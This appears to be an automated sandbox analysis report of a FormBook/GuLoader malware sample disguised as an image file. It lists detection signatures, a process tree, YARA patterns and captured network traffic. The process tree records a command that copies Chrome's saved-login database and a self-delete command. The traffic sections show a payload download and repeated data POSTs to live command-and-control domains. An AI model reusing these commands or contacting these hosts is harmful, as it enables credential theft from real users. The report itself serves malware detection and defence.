Loading ...

Play interactive tourEdit tour

Analysis Report IMAGE-M265NV_20200329_180550_0001 from google.com

Overview

General Information

Sample Name:IMAGE-M265NV_20200329_180550_0001 from google.com (renamed file extension from com to exe)
MD5:32ab992ed2a6e72e72558654f48ff32d
SHA1:091f2c9629786090af31d832bb182d7dd5a2793c
SHA256:dc7e1a440e96897e4b84965c3922b82c475d6150aaafbc7b78dbac987a6de0a6

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • IMAGE-M265NV_20200329_180550_0001 from google.exe (PID: 3728 cmdline: 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
    • IMAGE-M265NV_20200329_180550_0001 from google.exe (PID: 5024 cmdline: 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • netsh.exe (PID: 460 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 3456 cmdline: /c del 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4484 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vp2d3tbpivbxnjq8.exe (PID: 4668 cmdline: 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
        • vp2d3tbpivbxnjq8.exe (PID: 2408 cmdline: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe MD5: 32AB992ED2A6E72E72558654F48FF32D)
        • vp2d3tbpivbxnjq8.exe (PID: 4920 cmdline: 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18429:$sqlite3step: 68 34 1C 7B E1
      • 0x1853c:$sqlite3step: 68 34 1C 7B E1
      • 0x18458:$sqlite3text: 68 38 2A 90 C5
      • 0x1857d:$sqlite3text: 68 38 2A 90 C5
      • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 7 entries

      Sigma Overview


      System Summary:

      barindex
      Sigma detected: Steal Google chrome login dataShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\netsh.exe, ParentImage: C:\Windows\SysWOW64\netsh.exe, ParentProcessId: 460, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 4484

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: pashupatiexports.comVirustotal: Detection: 7%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exeVirustotal: Detection: 44%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exeMetadefender: Detection: 29%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exeReversingLabs: Detection: 48%
      Multi AV Scanner detection for submitted fileShow sources
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeVirustotal: Detection: 44%Perma Link
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeMetadefender: Detection: 29%Perma Link
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeReversingLabs: Detection: 48%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 4x nop then mov eax, 00000539h0_2_029F254A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 4x nop then mov eax, 00000539h1_2_0056254A
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 4x nop then mov eax, 00000539h14_2_0209254A

      Source: global trafficHTTP traffic detected: GET /h2s/?L48Hat=JZppaGuo8tb/Wg9K8KFoiK07esopG7Fv+ZRkorRAZiFZKSPuahWSLcFfANW1R99W0phJ&KN98bL=_v2HRVCXLJ90 HTTP/1.1Host: www.hookbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /h2s/?L48Hat=bMh33HuRgKDpY/y5BaHo7Jgx7M+JN321x5doFz59jAJwuNYRwM6nR/ehq53kINTgdUX/&KN98bL=_v2HRVCXLJ90 HTTP/1.1Host: www.criptohouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 184.168.221.42 184.168.221.42
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: GET /bin_hzgJnJgi173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pashupatiexports.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 68 72 31 52 38 76 64 58 48 4e 55 32 65 5a 32 35 50 43 4f 7a 58 67 50 77 59 28 4e 73 5f 75 30 53 41 66 52 48 73 77 64 75 5f 5a 71 4a 56 57 53 45 77 76 39 4f 64 70 42 47 7a 54 70 31 54 73 63 68 75 4d 56 34 48 74 73 4d 43 6a 74 6b 4e 4c 49 76 57 61 75 6a 71 6b 61 77 64 44 4f 42 63 46 52 59 6e 41 69 69 46 59 59 56 68 48 6d 36 45 77 6b 33 46 28 66 62 56 76 30 55 51 31 6b 51 38 51 75 4d 6f 62 7a 43 71 6e 34 66 38 4c 55 32 5f 76 49 47 35 35 33 66 79 54 32 4a 34 36 56 47 42 76 42 75 73 39 68 7a 77 71 35 35 38 47 68 70 74 4e 4e 42 4c 67 76 67 59 76 48 5a 68 6a 7a 61 68 41 51 59 6a 6d 5a 61 52 53 46 48 79 43 38 57 34 6a 45 4e 66 38 79 36 2d 30 5a 48 70 6e 43 54 72 49 52 6c 5f 4a 31 70 53 67 63 72 35 6f 43 59 38 36 55 37 70 78 6f 69 32 58 70 31 77 7e 4e 69 77 79 74 59 7a 61 2d 38 4a 41 4d 6a 58 6e 5a 30 4e 67 6c 39 73 72 34 32 4c 63 46 4e 79 65 41 35 59 71 4b 77 67 55 72 49 48 38 4d 74 4a 54 70 63 36 75 6a 52 74 4c 32 42 45 39 49 6a 6e 54 6d 54 34 51 30 67 55 4f 77 50 57 72 75 70 53 38 54 66 4c 31 62 61 58 57 4c 63 39 39 54 45 73 35 63 62 6f 45 6b 32 33 77 56 44 55 75 58 45 69 41 54 64 51 4f 42 67 38 30 64 33 38 35 49 78 4c 47 69 38 4f 7e 2d 72 71 33 77 41 67 30 56 58 64 57 46 6a 55 4a 6e 77 36 6f 66 38 2d 62 70 6a 7a 65 78 73 38 5a 31 6b 6d 56 4a 33 52 4d 5a 43 77 4c 6d 44 54 6d 45 59 37 4e 66 66 36 4b 57 7e 61 39 32 4a 55 51 56 45 4c 58 5a 58 57 56 2d 43 39 77 51 41 52 45 43 4b 4f 69 4a 6b 38 45 43 68 48 50 4f 54 71 63 32 48 51 7a 58 72 72 44 69 49 7a 64 52 71 74 69 79 70 4e 48 69 54 4d 28 51 68 79 4a 51 64 73 77 6c 4d 4c 31 5a 4c 65 34 53 36 62 7e 4d 54 32 45 47 48 43 45 36 70 78 33 67 6f 43 4f 6d 67 62 4b 71 54 47 64 55 38 53 47 6b 31 5a 48 79 48 73 52 75 68 53 70 61 42 50 73 4a 36 50 38 49 47 4c 59 76 4e 33 30 35 48 53 42 6e 43 59 4a 52 65 44 28 70 59 64 69 35 57 75 7e 34 74 72 51 72 77 4b 34 37 4e 4e 6a 41 58 63 4d 44 53 62 34 55 48 69 49 50 28 53 78 6f 73 75 45 55 57 65 4a 74 77 45 71 2d 7a 4c 36 34 49 6f 5a 70 74 51 5a 6e 6a 39 48 61 62 35 42 45 67 32 63 54 39 36 78 5f 4c 33 7a 63 37 76 70 35 45 79 57 32 46 53 61 4d 59 46 6e 36 6a 45 68 5a 53 4b 38 44 45 6a 5a 6a 33 38 58 64 77 42 6a 6d 6a 48 75 35 59 69 58 4f 6e 6b 59 31 30 56 4c 43 6b 7a 65 36 56 37 7
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 68 72 31 52 38 76 64 58 48 4e 55 32 65 5a 32 35 50 43 4f 7a 58 67 50 77 59 28 4e 73 5f 75 30 53 41 66 52 48 73 77 64 75 5f 5a 71 4a 56 57 53 45 77 76 39 4f 64 70 42 47 7a 54 70 31 54 73 63 68 75 4d 56 34 48 74 73 4d 43 6a 74 6b 4e 4c 49 76 57 61 75 6a 71 6b 61 77 64 44 4f 42 63 46 52 59 6e 41 69 69 46 59 59 56 68 48 6d 36 45 77 6b 33 46 28 66 62 56 76 30 55 51 31 6b 51 38 51 75 4d 6f 62 7a 43 71 6e 34 66 38 4c 55 32 5f 76 49 47 35 35 33 66 79 54 32 4a 34 36 56 47 42 76 42 75 73 39 68 7a 77 71 35 35 38 47 68 70 74 4e 4e 42 4c 67 76 67 59 76 48 5a 68 6a 7a 61 68 41 51 59 6a 6d 5a 61 52 53 46 48 79 43 38 57 34 6a 45 4e 66 38 79 36 2d 30 5a 48 70 6e 43 54 72 49 52 6c 5f 4a 31 70 53 67 63 72 35 6f 43 59 38 36 55 37 70 78 6f 69 32 58 70 31 77 7e 4e 69 77 79 74 59 7a 61 2d 38 4a 41 4d 6a 58 6e 5a 30 4e 67 6c 39 73 72 34 32 4c 63 46 4e 79 65 41 35 59 71 4b 77 67 55 72 49 48 38 4d 74 4a 54 70 63 36 75 6a 52 74 4c 32 42 45 39 49 6a 6e 54 6d 54 34 51 30 67 55 4f 77 50 57 72 75 70 53 38 54 66 4c 31 62 61 58 57 4c 63 39 39 54 45 73 35 63 62 6f 45 6b 32 33 77 56 44 55 75 58 45 69 41 54 64 51 4f 42 67 38 30 64 33 38 35 49 78 4c 47 69 38 4f 7e 2d 72 71 33 77 41 67 30 56 58 64 57 46 6a 55 4a 6e 77 36 6f 66 38 2d 62 70 6a 7a 65 78 73 38 5a 31 6b 6d 56 4a 33 52 4d 5a 43 77 4c 6d 44 54 6d 45 59 37 4e 66 66 36 4b 57 7e 61 39 32 4a 55 51 56 45 4c 58 5a 58 57 56 2d 43 39 77 51 41 52 45 43 4b 4f 69 4a 6b 38 45 43 68 48 50 4f 54 71 63 32 48 51 7a 58 72 72 44 69 49 7a 64 52 71 74 69 79 70 4e 48 69 54 4d 28 51 68 79 4a 51 64 73 77 6c 4d 4c 31 5a 4c 65 34 53 36 62 7e 4d 54 32 45 47 48 43 45 36 70 78 33 67 6f 43 4f 6d 67 62 4b 71 54 47 64 55 38 53 47 6b 31 5a 48 79 48 73 52 75 68 53 70 61 42 50 73 4a 36 50 38 49 47 4c 59 76 4e 33 30 35 48 53 42 6e 43 59 4a 52 65 44 28 70 59 64 69 35 57 75 7e 34 74 72 51 72 77 4b 34 37 4e 4e 6a 41 58 63 4d 44 53 62 34 55 48 69 49 50 28 53 78 6f 73 75 45 55 57 65 4a 74 77 45 71 2d 7a 4c 36 34 49 6f 5a 70 74 51 5a 6e 6a 39 48 61 62 35 42 45 67 32 63 54 39 36 78 5f 4c 33 7a 63 37 76 70 35 45 79 57 32 46 53 61 4d 59 46 6e 36 6a 45 68 5a 53 4b 38 44 45 6a 5a 6a 33 38 58 64 77 42 6a 6d 6a 48 75 35 59 69 58 4f 6e 6b 59 31 30 56 4c 43 6b 7a 65 36 56 37 7
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 68 72 31 52 38 76 64 58 48 4e 55 32 65 5a 32 35 50 43 4f 7a 58 67 50 77 59 28 4e 73 5f 75 30 53 41 66 52 48 73 77 64 75 5f 5a 71 4a 56 57 53 45 77 76 39 4f 64 70 42 47 7a 54 70 31 54 73 63 68 75 4d 56 34 48 74 73 4d 43 6a 74 6b 4e 4c 49 76 57 61 75 6a 71 6b 61 77 64 44 4f 42 63 46 52 59 6e 41 69 69 46 59 59 56 68 48 6d 36 45 77 6b 33 46 28 66 62 56 76 30 55 51 31 6b 51 38 51 75 4d 6f 62 7a 43 71 6e 34 66 38 4c 55 32 5f 76 49 47 35 35 33 66 79 54 32 4a 34 36 56 47 42 76 42 75 73 39 68 7a 77 71 35 35 38 47 68 70 74 4e 4e 42 4c 67 76 67 59 76 48 5a 68 6a 7a 61 68 41 51 59 6a 6d 5a 61 52 53 46 48 79 43 38 57 34 6a 45 4e 66 38 79 36 2d 30 5a 48 70 6e 43 54 72 49 52 6c 5f 4a 31 70 53 67 63 72 35 6f 43 59 38 36 55 37 70 78 6f 69 32 58 70 31 77 7e 4e 69 77 79 74 59 7a 61 2d 38 4a 41 4d 6a 58 6e 5a 30 4e 67 6c 39 73 72 34 32 4c 63 46 4e 79 65 41 35 59 71 4b 77 67 55 72 49 48 38 4d 74 4a 54 70 63 36 75 6a 52 74 4c 32 42 45 39 49 6a 6e 54 6d 54 34 51 30 67 55 4f 77 50 57 72 75 70 53 38 54 66 4c 31 62 61 58 57 4c 63 39 39 54 45 73 35 63 62 6f 45 6b 32 33 77 56 44 55 75 58 45 69 41 54 64 51 4f 42 67 38 30 64 33 38 35 49 78 4c 47 69 38 4f 7e 2d 72 71 33 77 41 67 30 56 58 64 57 46 6a 55 4a 6e 77 36 6f 66 38 2d 62 70 6a 7a 65 78 73 38 5a 31 6b 6d 56 4a 33 52 4d 5a 43 77 4c 6d 44 54 6d 45 59 37 4e 66 66 36 4b 57 7e 61 39 32 4a 55 51 56 45 4c 58 5a 58 57 56 2d 43 39 77 51 41 52 45 43 4b 4f 69 4a 6b 38 45 43 68 48 50 4f 54 71 63 32 48 51 7a 58 72 72 44 69 49 7a 64 52 71 74 69 79 70 4e 48 69 54 4d 28 51 68 79 4a 51 64 73 77 6c 4d 4c 31 5a 4c 65 34 53 36 62 7e 4d 54 32 45 47 48 43 45 36 70 78 33 67 6f 43 4f 6d 67 62 4b 71 54 47 64 55 38 53 47 6b 31 5a 48 79 48 73 52 75 68 53 70 61 42 50 73 4a 36 50 38 49 47 4c 59 76 4e 33 30 35 48 53 42 6e 43 59 4a 52 65 44 28 70 59 64 69 35 57 75 7e 34 74 72 51 72 77 4b 34 37 4e 4e 6a 41 58 63 4d 44 53 62 34 55 48 69 49 50 28 53 78 6f 73 75 45 55 57 65 4a 74 77 45 71 2d 7a 4c 36 34 49 6f 5a 70 74 51 5a 6e 6a 39 48 61 62 35 42 45 67 32 63 54 39 36 78 5f 4c 33 7a 63 37 76 70 35 45 79 57 32 46 53 61 4d 59 46 6e 36 6a 45 68 5a 53 4b 38 44 45 6a 5a 6a 33 38 58 64 77 42 6a 6d 6a 48 75 35 59 69 58 4f 6e 6b 59 31 30 56 4c 43 6b 7a 65 36 56 37 7
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 Data Ascii: L48Hat=TutNpiPk0O7hPN6oJN6Crfs5(JSvD2Wjrs0SWhd2jRVHnd4_htrjZY(t4pu6Md36CR37oMhuhMEW1DQPg94ZPxvVsIaeWoWQibVvrXoFlsiav4D-~5ddYBpxWH4Pqd8
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 Data Ascii: L48Hat=TutNpiPk0O7hPN6oJN6Crfs5(JSvD2Wjrs0SWhd2jRVHnd4_htrjZY(t4pu6Md36CR37oMhuhMEW1DQPg94ZPxvVsIaeWoWQibVvrXoFlsiav4D-~5ddYBpxWH4Pqd8
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 68 72 31 52 38 76 64 58 48 4e 55 32 65 5a 32 35 50 43 4f 7a 58 67 50 77 59 28 4e 73 5f 75 30 53 41 66 52 48 73 77 64 75 5f 5a 71 4a 56 57 53 45 77 76 39 4f 64 70 42 47 7a 54 70 31 54 73 63 68 75 4d 56 34 48 74 73 4d 43 6a 74 6b 4e 4c 49 76 57 61 75 6a 71 6b 61 77 64 44 4f 42 63 46 52 59 6e 41 69 69 46 59 59 56 68 48 6d 36 45 77 6b 33 46 28 66 62 56 76 30 55 51 31 6b 51 38 51 75 4d 6f 62 7a 43 71 6e 34 66 38 4c 55 32 5f 76 49 47 35 35 33 66 79 54 32 4a 34 36 56 47 42 76 42 75 73 39 68 7a 77 71 35 35 38 47 68 70 74 4e 4e 42 4c 67 76 67 59 76 48 5a 68 6a 7a 61 68 41 51 59 6a 6d 5a 61 52 53 46 48 79 43 38 57 34 6a 45 4e 66 38 79 36 2d 30 5a 48 70 6e 43 54 72 49 52 6c 5f 4a 31 70 53 67 63 72 35 6f 43 59 38 36 55 37 70 78 6f 69 32 58 70 31 77 7e 4e 69 77 79 74 59 7a 61 2d 38 4a 41 4d 6a 58 6e 5a 30 4e 67 6c 39 73 72 34 32 4c 63 46 4e 79 65 41 35 59 71 4b 77 67 55 72 49 48 38 4d 74 4a 54 70 63 36 75 6a 52 74 4c 32 42 45 39 49 6a 6e 54 6d 54 34 51 30 67 55 4f 77 50 57 72 75 70 53 38 54 66 4c 31 62 61 58 57 4c 63 39 39 54 45 73 35 63 62 6f 45 6b 32 33 77 56 44 55 75 58 45 69 41 54 64 51 4f 42 67 38 30 64 33 38 35 49 78 4c 47 69 38 4f 7e 2d 72 71 33 77 41 67 30 56 58 64 57 46 6a 55 4a 6e 77 36 6f 66 38 2d 62 70 6a 7a 65 78 73 38 5a 31 6b 6d 56 4a 33 52 4d 5a 43 77 4c 6d 44 54 6d 45 59 37 4e 66 66 36 4b 57 7e 61 39 32 4a 55 51 56 45 4c 58 5a 58 57 56 2d 43 39 77 51 41 52 45 43 4b 4f 69 4a 6b 38 45 43 68 48 50 4f 54 71 63 32 48 51 7a 58 72 72 44 69 49 7a 64 52 71 74 69 79 70 4e 48 69 54 4d 28 51 68 79 4a 51 64 73 77 6c 4d 4c 31 5a 4c 65 34 53 36 62 7e 4d 54 32 45 47 48 43 45 36 70 78 33 67 6f 43 4f 6d 67 62 4b 71 54 47 64 55 38 53 47 6b 31 5a 48 79 48 73 52 75 68 53 70 61 42 50 73 4a 36 50 38 49 47 4c 59 76 4e 33 30 35 48 53 42 6e 43 59 4a 52 65 44 28 70 59 64 69 35 57 75 7e 34 74 72 51 72 77 4b 34 37 4e 4e 6a 41 58 63 4d 44 53 62 34 55 48 69 49 50 28 53 78 6f 73 75 45 55 57 65 4a 74 77 45 71 2d 7a 4c 36 34 49 6f 5a 70 74 51 5a 6e 6a 39 48 61 62 35 42 45 67 32 63 54 39 36 78 5f 4c 33 7a 63 37 76 70 35 45 79 57 32 46 53 61 4d 59 46 6e 36 6a 45 68 5a 53 4b 38 44 45 6a 5a 6a 33 38 58 64 77 42 6a 6d 